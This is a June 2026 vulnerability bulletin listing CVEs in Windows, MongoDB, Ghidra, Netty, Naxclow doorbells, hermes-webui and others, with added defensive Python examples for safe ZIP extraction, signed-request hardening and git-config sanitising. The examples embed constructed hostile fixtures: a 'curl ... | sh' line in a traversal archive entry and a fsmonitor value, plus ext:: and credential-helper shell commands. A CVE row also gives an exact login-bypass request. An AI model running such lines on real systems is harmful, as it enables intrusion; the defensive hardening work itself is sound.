| Microsoft--Windows 11 Version 24H2 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-45654 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44804 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44807 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44808 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44811 |
| Microsoft--Windows 11 version 26H1 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44813 |
| Microsoft--Windows Narrator Braille | Untrusted search path in Windows Narrator Braille allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-48565 |
| Microsoft--Windows Server 2012 | Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-42987 |
| Microsoft--Windows Server 2012 | Integer overflow or wraparound in Windows Kerberos allows an authorized attacker to execute code over an adjacent network. | 2026-06-09 | 7.1 | CVE-2026-47288 |
| Microsoft--Windows Server 2016 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-47654 |
| Microsoft--Windows Server 2022 | Stack-based buffer overflow in Active Directory Domain Services allows an authorized attacker to execute code over a network. | 2026-06-09 | 8.8 | CVE-2026-45648 |
| Missilesilo--KittyCatfish | KittyCatfish 2.2 plugin for WordPress contains an SQL injection vulnerability that allows unauthenticated attackers to read database contents by exploiting an unescaped GET parameter. Attackers can inject SQL code through the 'kc_ad' parameter in base.css.php or kittycatfish.php to extract sensitive database information using boolean-based blind or time-based blind techniques. | 2026-06-09 | 8.2 | CVE-2017-20246 |
| moby--moby | Moby is an open source container framework. In Docker Engine prior to version 29.5.1, Docker Daemon versions 28.5.2 and prior, and Moby Daemon prior to version 2.0.0-beta.14, a race condition during docker cp mount setup allows a malicious container to redirect a bind mount target to an arbitrary host path, potentially overwriting host files or causing denial of service. This issue has been patched in Docker Engine version 29.5.1 and Moby Daemon version 2.0.0-beta.14. | 2026-06-12 | 7.2 | CVE-2026-42306 |
| MongoDB--MongoDB | A use-after-free vulnerability exists in MongoDB Server's server-side JavaScript engine when converting BSON documents to JavaScript arrays. An authenticated user with read privileges who is able to run server-side JavaScript (for example, via $where or $function) can cause the server to access memory that has already been freed. This may result in disclosure of information from the mongod process memory or a denial of service through a server crash. | 2026-06-12 | 8.8 | CVE-2026-11933 |
| MongoDB--MongoDB Server | The $_internalApplyOplogUpdate aggregation pipeline stage can be used to apply a document diff containing a malformed binary diff, causing an out-of-bounds memory read or a server crash. $_internalApplyOplogUpdate can be executed by any authenticated user with access to the aggregate command. | 2026-06-09 | 8.1 | CVE-2026-9753 |
| MongoDB--MongoDB Server | A vulnerability in MongoDB Server's BSON validation logic allows an unauthenticated user to crash the mongod process by sending a specially crafted message. The BSON validator's handling of certain nested binary data structures permits uncontrolled mutual recursion between validation functions, where each re-entry resets internal depth tracking. | 2026-06-09 | 7.5 | CVE-2026-9740 |
| MongoDB--MongoDB Server | When OIDC authentication is enabled in configuration, clients may set specific values in the "mechanism" parameter of the "authenticate" command that lead to server crash. The authenticate command is accessible to unauthenticated clients, leading to pre-auth denial-of-service in affected product configurations. | 2026-06-09 | 7.5 | CVE-2026-9742 |
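
The BSON validator entry above (CVE-2026-9740) describes a bug class rather than a single bad line: two validation functions call each other, and the depth counter restarts at zero on every re-entry, so no nesting limit ever triggers. The toy below is an added illustration, not MongoDB's code and not its BSON layout: it defines a three-type document format (int32, binary, terminator) with an assumed binary subtype 0x80 whose payload is itself a document, and validates it with and without the depth reset.

```python
import struct

MAX_DEPTH = 200          # nesting the validator is willing to accept
NESTED_SUBTYPE = 0x80    # toy binary subtype whose payload is itself a document (assumption)


def encode_nested(depth):
    """Constructed input: a document wrapped `depth` times inside binary elements."""
    doc = b"\x10" + struct.pack("<i", 1) + b"\x00"          # innermost: one int32, terminator
    for _ in range(depth):
        # element type 0x05, int32 payload length, subtype byte, payload, document terminator
        doc = b"\x05" + struct.pack("<i", len(doc)) + bytes([NESTED_SUBTYPE]) + doc + b"\x00"
    return doc


def validate(buf, reset_on_reentry):
    """Return "ok", "rejected" (limit enforced cleanly) or "crash" (stack exhausted).

    check_doc hands binary payloads to check_binary, which re-enters check_doc for
    nested payloads. With reset_on_reentry=True the inner call starts again from
    depth 0, which is the bug class in the entry above: MAX_DEPTH is never reached.
    """
    def check_doc(pos, depth):
        if depth > MAX_DEPTH:
            raise ValueError("nesting too deep")
        while True:
            elem_type = buf[pos]
            pos += 1
            if elem_type == 0x00:                       # end of document
                return pos
            if elem_type == 0x10:                       # int32
                pos += 4
            elif elem_type == 0x05:                     # binary
                length = struct.unpack_from("<i", buf, pos)[0]
                pos += 4
                pos = check_binary(pos, length, depth)
            else:
                raise ValueError("unknown element type %#x" % elem_type)

    def check_binary(pos, length, depth):
        subtype = buf[pos]
        pos += 1
        if subtype == NESTED_SUBTYPE:
            inner_depth = 0 if reset_on_reentry else depth + 1
            end = check_doc(pos, inner_depth)
            if end != pos + length:
                raise ValueError("payload length mismatch")
            return end
        return pos + length

    try:
        check_doc(0, 0)
        return "ok"
    except RecursionError:
        return "crash"        # in a C++ server this is a stack overflow, i.e. the process dies
    except ValueError:
        return "rejected"
```

Python converts stack exhaustion into a catchable RecursionError, which is what makes the "crash" outcome observable here; in mongod the same input takes the process down. The fix is the one-line change in check_binary: thread the caller's depth through every re-entry instead of restarting it.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|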
| MOSK Information Technologies Ltd.--CBS Platform | Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in MOSK Information Technologies Ltd. CBS Platform allows SQL Injection. This issue affects CBS Platform: through 09062026. NOTE: The vendor was contacted and it was learned that the product is not supported. | 2026-06-09 | 9.8 | CVE-2026-8025 |
| nationalsecurityagency--ghidra | Ghidra 11.0 before 12.1 contains a SQL injection vulnerability in the changePassword() method of PostgresFunctionDatabase that fails to escape double quotes in usernames interpolated into ALTER ROLE statements. Authenticated attackers can inject SQL commands via crafted username parameters in PasswordChange network messages to escalate to PostgreSQL superuser privileges and gain full database control. | 2026-06-10 | 8.8 | CVE-2026-49498 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains an unsafe deserialization vulnerability in client-side Shared-Project RMI connection code that allows unauthenticated remote code execution. Attackers can craft a malicious project file with a ghidra:// URL that, when opened via File → Open Project, deserializes untrusted objects using a Jython 2.7.4 gadget chain to execute arbitrary commands. | 2026-06-10 | 8.8 | CVE-2026-52751 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains an authentication bypass vulnerability in PKIAuthenticationModule.authenticate() that allows any user with a valid CA-signed certificate to impersonate other users by presenting their public certificate with a null signature. Attackers can escalate privileges, modify repository access controls, exfiltrate shared reverse engineering databases, and permanently compromise server integrity. | 2026-06-10 | 8.8 | CVE-2026-52754 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a SQL injection vulnerability in BSim filter types that concatenate user-supplied values directly into SQL queries without escaping or parameterization. Remote attackers can inject arbitrary SQL via the BSim network query protocol to read, modify, or delete data in the PostgreSQL database. | 2026-06-10 | 8.8 | CVE-2026-52758 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a command injection vulnerability in URL annotation handling on Windows where cmd.exe metacharacters are not properly escaped. Attackers can execute arbitrary commands under the Ghidra user's privileges by embedding malicious URLs in program comments that victims click. | 2026-06-10 | 7.8 | CVE-2026-52750 |
| nationalsecurityagency--ghidra | Ghidra before 12.0.2 contains a path traversal vulnerability in the extension installer that fails to validate ZIP entry names during extraction. Attackers can craft malicious extensions with traversal sequences like ../ in filenames to write arbitrary files outside the intended directory, enabling code execution. | 2026-06-10 | 7.8 | CVE-2026-52752 |
| nationalsecurityagency--ghidra | Ghidra before 12.0.4 contains a path traversal vulnerability in the theme import functionality that allows attackers to write files outside the intended theme directory. Attackers can craft malicious theme ZIP files with traversal sequences in filenames to execute arbitrary code or modify sensitive files like .bashrc or .ssh/authorized_keys. | 2026-06-10 | 7.8 | CVE-2026-52755 |
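
Both Ghidra ZIP entries above (CVE-2026-52752, extension installer; CVE-2026-52755, theme import) are the same mistake: entry names are trusted as relative paths. The extractor below is an added example in Python, not Ghidra's Java code; it refuses absolute names, drive-letter prefixes, any `..` component, symlink entries, and anything whose resolved path leaves the destination, and then writes only what survived. The archive it is run against is constructed inline.

```python
import io
import os
import stat
import tempfile
import zipfile


def unsafe_entry_reason(name):
    """Why an archive entry name must not be written, or None if the name is acceptable."""
    norm = name.replace("\\", "/")                # Windows-built archives use backslashes
    if norm.startswith("/"):
        return "absolute path"
    if len(norm) > 1 and norm[1] == ":":          # C:\... drive-letter prefix
        return "drive letter"
    if ".." in norm.split("/"):
        return "parent-directory traversal"
    return None


def safe_extract(archive_bytes, dest):
    """Extract into `dest`, refusing any entry that could land outside it.

    Returns (extracted_names, [(name, reason), ...]).
    """
    dest = os.path.realpath(dest)
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            reason = unsafe_entry_reason(info.filename)
            if reason is None and stat.S_ISLNK(info.external_attr >> 16):
                reason = "symbolic link entry"    # a link out of dest would redirect later writes
            target = None
            if reason is None:
                parts = info.filename.replace("\\", "/").split("/")
                target = os.path.realpath(os.path.join(dest, *parts))
                if os.path.commonpath([dest, target]) != dest:
                    reason = "escapes destination after resolution"
            if reason is not None:
                rejected.append((info.filename, reason))
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as fh:
                    fh.write(zf.read(info))
            extracted.append(info.filename)
    return extracted, rejected


def build_demo_archive():
    """Constructed theme/extension archive: one legitimate file plus three hostile entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("theme/colors.properties", "background=#000000\n")
        zf.writestr("../../.bashrc", "curl http://203.0.113.7/x | sh\n")   # traversal
        zf.writestr("/etc/cron.d/evil", "* * * * * root id\n")              # absolute path
        link = zipfile.ZipInfo("theme/link")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16                   # symlink entry
        zf.writestr(link, "/root/.ssh")
    return buf.getvalue()


def demo():
    """Run the constructed archive through safe_extract in a scratch directory."""
    dest = tempfile.mkdtemp(prefix="safe-extract-")
    extracted, rejected = safe_extract(build_demo_archive(), dest)
    with open(os.path.join(dest, "theme", "colors.properties")) as fh:
        content = fh.read()
    return extracted, dict(rejected), content
```

The name check alone is not enough: an earlier symlink entry would turn a later, innocent-looking relative name into a write somewhere else, which is why link entries are refused and the resolved path is re-checked against the destination before each write.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|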
| Naxclow--Smart Doorbell X3 | Naxclow devices use a uniform request-signing scheme based on a hard-coded, platform-wide salt embedded in every firmware image. Once this salt is recovered from any device, an attacker can generate valid signatures for arbitrary device or account operations due to the absence of per-device keys, server-side nonce tracking, or replay protections. Combined with the system's use of plain HTTP for control-plane traffic, the construction enables broad request forgery and impersonation across the platform. | 2026-06-12 | 9.8 | CVE-2026-28742 |
| Naxclow--Smart Doorbell X3 | A flaw in Naxclow's platform's onboarding workflow allows an attacker to replay a confirm-then-bind sequence to silently reassign a device to an arbitrary account. Because the affected endpoints validate request signatures but do not confirm legitimate ownership, an attacker with any account can take over a device without user interaction while the device remains online and unaware. | 2026-06-12 | 8.8 | CVE-2026-42947 |
| Naxclow--Smart Doorbell X3 | Naxclow devices use a server-side, per-device relay credential that never rotates and is re-issued to the device on each boot. Because this credential remains valid indefinitely and cannot be reset or revoked by the legitimate owner, any party that obtains it through any exposure path can maintain persistent access to the device's relay channel. This enables long-term impersonation or interception, even after factory resets or re-onboarding. | 2026-06-12 | 8.1 | CVE-2026-50101 |
| Naxclow--Smart Doorbell X3 | The Naxclow platform API that returns device relay registration details exposes a persistent credential without verifying that the requester is the legitimate device or owner. An actor able to present a platform-valid request signature can retrieve credentials for arbitrary devices and register on the relay as that device, enabling interception and disruption of its communications. | 2026-06-12 | 7.5 | CVE-2026-50108 |
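
The four Naxclow entries above share one design: a platform-wide secret authenticates requests, a valid signature is treated as proof of identity, and nothing stops a captured request from being sent again. The code below is an added illustration, not Naxclow's protocol; the salt, key values, parameter names and endpoint behaviour are all assumed. It shows the weak construction (one salt, no nonce) being forged by anyone who has recovered the salt, and a hardened server that keys signatures per principal, tracks nonces, bounds timestamps, checks ownership before a bind (CVE-2026-42947), and hands relay credentials only to the device they belong to (CVE-2026-50108).

```python
import hashlib
import hmac

# Constructed stand-ins: the real salt, key formats and endpoint names are not on the page.
PLATFORM_SALT = b"firmware-wide-salt-recovered-from-any-unit"
PRINCIPAL_KEYS = {                       # per-principal secrets only the hardened server holds
    "dev-0001": b"k-dev-0001",
    "acct-owner": b"k-acct-owner",
    "acct-attacker": b"k-acct-attacker",
}


def canonical(params):
    """Sort keys so both sides sign exactly the same byte string."""
    return "&".join(f"{k}={params[k]}" for k in sorted(params)).encode()


# Weak scheme: one salt in every firmware image, no per-device key, no freshness.
def weak_sign(params):
    return hashlib.sha256(PLATFORM_SALT + canonical(params)).hexdigest()


def weak_verify(params, sig):
    return hmac.compare_digest(weak_sign(params), sig)


# Hardened scheme: HMAC under the named principal's own key, fresh nonce, bounded timestamp.
def sign(principal, params):
    return hmac.new(PRINCIPAL_KEYS[principal], canonical(params), hashlib.sha256).hexdigest()


class Server:
    def __init__(self, window=60):
        self.window = window
        self.seen = set()                          # (principal, nonce) pairs already accepted
        self.owner = {"dev-0001": "acct-owner"}    # current device -> account binding

    def verify(self, params, sig, now):
        key = PRINCIPAL_KEYS.get(params.get("principal"))
        if key is None:
            return "unknown principal"
        expected = hmac.new(key, canonical(params), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, sig):
            return "bad signature"
        if abs(now - int(params.get("ts", 0))) > self.window:
            return "stale"
        marker = (params["principal"], params.get("nonce"))
        if marker in self.seen:
            return "replay"
        self.seen.add(marker)
        return "ok"

    def bind(self, params, sig, now):
        """Assign a device to the requesting account only if it is unbound or already theirs."""
        status = self.verify(params, sig, now)
        if status != "ok":
            return status
        current = self.owner.get(params["device"])
        if current not in (None, params["principal"]):
            return "not owner"
        self.owner[params["device"]] = params["principal"]
        return "bound"

    def relay_details(self, params, sig, now):
        """A valid signature is not identity: only the device itself may fetch its relay credential."""
        status = self.verify(params, sig, now)
        if status != "ok":
            return status
        if params["principal"] != params["device"]:
            return "not the device"
        return "credential-for-" + params["device"]


def demo(now=1_700_000_000):
    srv = Server()
    out = {}
    # 1. Weak scheme: whoever holds the salt forges a bind for somebody else's device.
    forged = {"action": "bind", "device": "dev-0001", "account": "acct-attacker"}
    out["weak_forgery_accepted"] = weak_verify(forged, weak_sign(forged))
    # 2. Hardened: the attacker's own key yields a valid signature, but the ownership check holds.
    p = {"action": "bind", "device": "dev-0001", "principal": "acct-attacker", "ts": now, "nonce": "n1"}
    out["hardened_takeover"] = srv.bind(p, sign("acct-attacker", p), now)
    # 3. Hardened: a validly signed request for another device's relay credential is refused.
    p = {"action": "relay", "device": "dev-0001", "principal": "acct-attacker", "ts": now, "nonce": "n2"}
    out["hardened_relay_fetch"] = srv.relay_details(p, sign("acct-attacker", p), now)
    # 4. The legitimate owner binds once; the captured request replayed five seconds later is refused.
    p = {"action": "bind", "device": "dev-0001", "principal": "acct-owner", "ts": now, "nonce": "n3"}
    s = sign("acct-owner", p)
    out["owner_bind"] = srv.bind(p, s, now)
    out["owner_bind_replayed"] = srv.bind(p, s, now + 5)
    return out
```

The nonce set grows without bound as written; a real server would expire entries older than the timestamp window, since anything outside the window is already rejected as stale.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|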
| Nefteprodukttekhnika LLC--BUK TS-G Gas Station Automation System | Nefteprodukttekhnika BUK TS-G Gas Station Automation System 2.9.1 through 2.10.2 on Linux contains an Improper Authentication vulnerability (CWE-287) in the system configuration module. The /php/ajax-login.php endpoint returns userid=1 (administrator) in response to any HTTP POST request that supplies arbitrary credentials (e.g., action=dologin&login=<any_value>&pwd=<any_value>), and subsequent privileged endpoints under /php/ajax-main.php and /modules/* do not validate a server-side session. A remote unauthenticated attacker can invoke any administrative action exposed by the configuration module, including reading and modifying user rules, fuel tank gauges, fuel dispensers, relays, cash registers, bank terminals, fuel cards, price and customer displays, cash collection, and pricing rules. | 2026-06-13 | 9.8 | CVE-2026-12183 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.358 contains an improper access control vulnerability that allows unauthenticated remote attackers to hijack initial setup by submitting the _set_password parameter to the settings API endpoint without any network origin restriction. Attackers on any reachable network can send a POST request to the settings endpoint during the first-run setup window to persist an arbitrary password hash, obtain a valid session cookie, and lock out the legitimate operator from their own instance. | 2026-06-11 | 9.4 | CVE-2026-49973 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.311 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands by placing malicious executable Git configuration in a workspace repository's .git/config file. Attackers can exploit Git subprocess invocations in api/workspace_git.py through vectors such as core.fsmonitor during git status, protocol.ext.allow with ext:: remotes during git fetch, credential.helper, core.askPass, core.gitProxy, or inherited environment variables including GIT_SSH_COMMAND to achieve arbitrary command execution on the host running the application. | 2026-06-09 | 8.8 | CVE-2026-49959 |
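
The entry above (CVE-2026-49959) lists the repository-config keys and environment variables through which git will run an attacker's command. The helper below is an added example, not code from hermes-webui: it scans a `.git/config` for those keys, builds a git command line whose `-c` overrides outrank the repository config, and strips the inherited environment variables before the subprocess runs. The `.git/config` it scans is constructed inline.

```python
import configparser
import os
import subprocess

# Repository-config keys the entry names as command-execution vectors, with the command-line
# override that neutralises each one (`git -c key=value` outranks every config file).
SAFE_OVERRIDES = {
    "core.fsmonitor": "false",        # boolean form, disables the fsmonitor hook
    "protocol.ext.allow": "never",    # blocks ext:: remotes
    "credential.helper": "",          # an empty value resets the helper list
    "core.askPass": "",
    "core.gitProxy": "",
    "core.sshCommand": "",
}

# Inherited environment that can point git at an attacker-chosen program.
DANGEROUS_ENV = (
    "GIT_SSH", "GIT_SSH_COMMAND", "GIT_ASKPASS", "GIT_PROXY_COMMAND",
    "GIT_EXTERNAL_DIFF", "GIT_CONFIG_PARAMETERS", "GIT_CONFIG_COUNT",
)

# (section, key) pairs worth refusing to run against at all when present in .git/config.
FLAGGED_KEYS = {
    ("core", "fsmonitor"), ("protocol", "allow"), ("credential", "helper"),
    ("core", "askpass"), ("core", "gitproxy"), ("core", "sshcommand"),
}

# Constructed hostile .git/config using the vectors listed in the entry.
DEMO_CONFIG = """\
[core]
    repositoryformatversion = 0
    fsmonitor = "curl http://203.0.113.7/x | sh"
[protocol "ext"]
    allow = always
[remote "origin"]
    url = ext::sh -c 'id > /tmp/pwned'
    fetch = +refs/heads/*:refs/remotes/origin/*
[credential]
    helper = !sh -c 'id > /tmp/pwned2'
"""


def flag_repo_config(config_text):
    """Return dotted names of dangerous settings found in a .git/config text."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True, delimiters=("=",))
    cp.read_string(config_text)
    flagged = []
    for section in cp.sections():
        head, _, sub = section.partition(" ")      # [remote "origin"] -> remote / origin
        head, sub = head.lower(), sub.strip().strip('"')
        for key, value in cp.items(section):
            dotted = ".".join(p for p in (head, sub, key) if p)
            if (head, key) in FLAGGED_KEYS:
                flagged.append(dotted)
            elif head == "remote" and key == "url" and (value or "").startswith("ext::"):
                flagged.append(dotted)
    return flagged


def hardened_git_argv(args):
    argv = ["git"]
    for key, value in SAFE_OVERRIDES.items():
        argv += ["-c", f"{key}={value}"]
    return argv + list(args)


def hardened_git_env(base_env):
    env = {k: v for k, v in base_env.items() if k not in DANGEROUS_ENV}
    env["GIT_CONFIG_NOSYSTEM"] = "1"     # ignore /etc/gitconfig
    env["GIT_TERMINAL_PROMPT"] = "0"     # never block on a credential prompt
    return env


def run_git(repo_dir, args, env=None):
    """Run git in a workspace with repo config neutralised; refuse outright if .git/config is hostile."""
    cfg_path = os.path.join(repo_dir, ".git", "config")
    if os.path.exists(cfg_path):
        with open(cfg_path, encoding="utf-8", errors="replace") as fh:
            flagged = flag_repo_config(fh.read())
        if flagged:
            raise RuntimeError("refusing to run git: hostile config keys " + ", ".join(flagged))
    return subprocess.run(hardened_git_argv(args), cwd=repo_dir,
                          env=hardened_git_env(env or os.environ),
                          capture_output=True, text=True, check=False)
```

The scan and the overrides are deliberately redundant: the overrides cover keys a scanner might miss in an unusual layout, and the scan turns an attempted attack into a logged refusal rather than a silently neutralised one.

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|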
| nesquena--hermes-webui | Hermes WebUI before version 0.51.296 contains a workspace boundary bypass vulnerability that allows authenticated attackers to circumvent blocked-root path checks by exploiting an early return in the SSH/remote terminal profile workspace resolution logic within _remote_terminal_workspace_candidate(). Attackers can configure a remote terminal working directory to a system directory such as /etc, causing the workspace resolution path to accept it as a trusted local workspace root before the _is_blocked_workspace_path() guard executes, enabling read access to local system files through workspace file-read helpers. | 2026-06-09 | 7.7 | CVE-2026-49957 |
| Netcad Software Inc.--E-İmar | Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Netcad Software Inc. E-İmar allows SQL Injection. This issue affects E-İmar: from 2.10.1.0 before 3.0.2. | 2026-06-09 | 9.8 | CVE-2026-7486 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-handler prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can bypass IPv6 subnet rules due to an incorrect masking operation in IpSubnetFilterRule.compareTo(). Valid public IP addresses can bypass the restrictions. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-11 | 8.1 | CVE-2026-44249 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 8.7 | CVE-2026-45674 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS cache poisoning. An attacker controlling an authoritative name server for a subdomain can poison the cache for parent domains (like `.co.uk`). The `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#add` method accepts any NS record from the AUTHORITY section as long as the record's name is a suffix of the questionName. Subsequently, the `handleWithAdditional` method caches the associated A records from the ADDITIONAL section directly into the `authoritativeDnsServerCache` under the parent domain's key. This bypasses standard bailiwick rules, under which a server authoritative for a subdomain must not be trusted to provide authoritative records for its parent. The poisoned cache is then used for all future resolutions under the parent domain's key. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 8.7 | CVE-2026-47691 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending a crafted Redis payload with deeply nested arrays. This forces the server to allocate a massive number of state objects and collections, leading to memory exhaustion and an OutOfMemoryError. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-11 | 7.5 | CVE-2026-44250 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending crafted Redis payloads across multiple connections without `\r\n`. This exhausts the server's direct memory pool (OutOfDirectMemoryError), preventing legitimate connections from being processed. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-11 | 7.5 | CVE-2026-44890 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, the default configuration of the `Http3ConnectionHandler` in the Netty HTTP/3 codec lacks an enforced maximum header size limit. When a peer does not explicitly specify `HTTP3_SETTINGS_MAX_FIELD_SECTION_SIZE`, the implementation defaults to an unbounded limit. This insecure default configuration allows a malicious client or server to send an enormous number of headers, leading to a memory exhaustion Denial of Service via an `OutOfMemoryError`. Version 4.2.15.Final contains a patch. | 2026-06-12 | 7.5 | CVE-2026-44892 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-codec-haproxy prior to versions 4.1.135.Final and 4.2.15.Final, when decoding a PP2_TYPE_SSL TLV, HAProxyMessage.readNextTLV() first calls `header.retainedSlice(header.readerIndex(), length)` and only then reads the 1-byte client field and 4-byte verify field. If the attacker sets the TLV length below 5, the subsequent readByte/readInt throws IndexOutOfBoundsException. HAProxyMessageDecoder only catches HAProxyProtocolException around this call, so the IOOBE propagates and the retained slice on the pooled cumulation buffer is never released. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-44893 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. NoQuicTokenHandler is the tokenHandler used when the application does not set one. Prior to version 4.2.15.Final, its writeToken() returns false (server will not send Retry - acceptable), but validateToken() unconditionally `return 0`. In QuicheQuicServerCodec.handlePacket(), a non-negative return from validateToken() is interpreted as 'token is valid, ODCID starts at offset 0', causing the server to call quiche_accept as if the client's address had been validated by a Retry round-trip. Per RFC 9000 §8.1, a validated address lifts the 3× anti-amplification send limit. Thus any attacker who includes ANY non-empty token bytes in an Initial packet - with a spoofed victim source IP - causes the Netty server to treat the victim as validated and reflect full-size handshake flights (certificates, etc.) toward it without the 3× cap. The correct 'no token handler' semantics would be to return -1 (invalid) so the normal un-validated path and amplification limit apply. Version 4.2.15.Final patches the issue. | 2026-06-12 | 7.5 | CVE-2026-44894 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SslClientHelloHandler.decode() reads the 24-bit TLS handshake length and, when the ClientHello does not fit in the first record, eagerly allocates `ctx.alloc().buffer(handshakeLength)` (line 161). The guard at line 140 is `handshakeLength > maxClientHelloLength && maxClientHelloLength != 0`, and the commonly-used SniHandler/AbstractSniHandler constructors (SniHandler(Mapping), SniHandler(AsyncMapping), AbstractSniHandler()) pass maxClientHelloLength=0 and handshakeTimeoutMillis=0, so the length guard is disabled and no timeout is scheduled. A 16 MiB request exceeds the default pooled chunk size and becomes a huge/unpooled allocation performed immediately. The buffer is retained in the handler until the channel closes. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-45416 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In versions of netty-transport-sctp prior to 4.1.135.Final and 4.2.15.Final, for each non-complete SctpMessage fragment the handler does `fragments.put(streamId, Unpooled.wrappedBuffer(frag, byteBuf))`, wrapping the previous accumulator and the new slice into a *new* CompositeByteBuf every time. After N fragments the accumulator is an N-deep chain of composites, each holding references and component arrays; readableBytes()/getBytes() on the final buffer recurse N levels. There is no limit on N, on total bytes, or on the number of streamIdentifiers an attacker can open (each gets its own map entry). A peer that never sets the `complete` flag can grow this structure indefinitely from tiny 1-byte DATA chunks. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-46340 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, a memory exhaustion vulnerability in the Netty HTTP/3 codec allows the creation of an infinite number of blocked streams, which can cause OOM error. Version 4.2.15.Final patches the issue. | 2026-06-12 | 7.5 | CVE-2026-48748 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SimpleTrustManagerFactory.engineGetTrustManagers() and related paths wrap any user-supplied plain X509TrustManager in X509TrustManagerWrapper, which extends X509ExtendedTrustManager but implements the 3-arg checkServerTrusted(chain, authType, SSLEngine) by discarding the SSLEngine and calling the 2-arg delegate. Because the object now IS an X509ExtendedTrustManager, neither SunJSSE's internal AbstractTrustManagerWrapper nor Netty's own OpenSslX509TrustManagerWrapper will re-wrap it to add endpoint-identification. Consequently, even though Netty 4.2 sets endpointIdentificationAlgorithm="HTTPS" by default, a client built with `SslContextBuilder.forClient().trustManager(somePlainX509TrustManager)` performs no hostname verification at all. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-50010 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, RedisArrayAggregator pre-allocates ArrayList with initial capacity equal to the RESP array element count declared in an array header. That count is taken from the wire before the corresponding child messages exist. A small malicious header can claim a huge initial capacity. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 7.5 | CVE-2026-50011 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.4.0 to before version 2.0.8, a RoleMember user can create a scheduled cron task with Cover=CronCoverAll, Servers=[] and an arbitrary Command. At every tick of the scheduler, the dashboard pushes that command to every server in the global ServerShared map - including servers that belong to other tenants (admin's servers, other members' servers). Each agent runs the command and returns the output, which is then sent to the attacker's own NotificationGroup → attacker-controlled webhook. This issue has been patched in version 2.0.8. | 2026-06-12 | 9.9 | CVE-2026-46716 |
